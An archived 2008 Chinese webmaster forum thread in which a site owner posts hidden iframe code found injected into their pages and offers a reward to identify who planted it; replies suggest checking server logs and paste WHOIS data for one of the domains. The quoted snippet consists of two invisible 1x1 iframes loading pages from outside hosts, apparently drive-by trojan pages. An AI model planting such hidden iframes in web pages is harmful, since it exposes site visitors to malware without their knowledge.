落伍者站长论坛's Archiver

千千静听 发表于 2008-4-27 17:46

本人出钱捉挂木马人

请问有谁知道是谁的,我出钱捉他

<ifRame src=http://cc.buhaoyishi.com/one/hao5.htm?015 widtH=1 name='2421' height=1></ifrAme><ifrAme src=httP://www.111880.net/s1.htm?4027 Width=1 name='2421' height=1></iframe>


已经查到了,谢谢大家

[[i] 本帖最后由 千千静听 于 2008-4-27 20:46 编辑 [/i]]

cpfthlb 发表于 2008-4-27 17:50

昏,就这样一个代码谁知道哦!

千千静听 发表于 2008-4-27 18:17

那你要怎样的才能查出来

bfcode 发表于 2008-4-27 18:50

iis日志什么的可以查到ip啊,就你那网址,可以分析他的木马

light2000 发表于 2008-4-27 19:47

Domain Name ..................... 111880.net
Registrant Name ................. Man Gao
Registrant Organization ......... Man.Gao
Registrant Address .............. Wan.Lihong
                                  Beijing, Beijing 210000
                                  CN
Registrant City ................. Beijing
Registrant Province/State ....... Beijing
Registrant Postal Code .......... 210000
Registrant Country Code ......... CN
Registrant Phone Number ......... +86.21123456
Registrant Fax .................. +86.21123456
Registrant Email ................ [email]jiubuyao@yahoo.cn[/email]
Administrative Name ............. Kevin Chin
Administrative Organization ..... SafetyName Inc.
Administrative Address .......... Room 1058 Constellation Building Gucheng Road
                                  ShiJingShan District
                                  Beijing,  100043
Administrative Country Code ..... Beijing,  100043
Administrative Phone Number ..... +86.1051281951
Administrative Fax .............. +86.1068826034
Administrative Email ............ [email]support@safetyName.com[/email]
Technical Name .................. Kevin Chin
Technical Organization .......... SafetyName Inc.
Technical Address ............... Room 1058 Constellation Building Gucheng Road
                                  ShiJingShan District
                                  Beijing,  100043
Technical Country Code .......... Beijing,  100043
Technical Phone Number .......... +86.1051281951
Technical Fax ................... +86.1068826034
Technical Email ................. [email]support@safetyName.com[/email]

prod 发表于 2008-4-27 20:00

:o 很有意思吗?

cpfthlb 发表于 2008-4-27 21:19

回复 铁牌 light2000 的帖子

那个域名注册信息一看就知道不真实
没用的

88117278 发表于 2008-4-29 19:36

:( :(

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.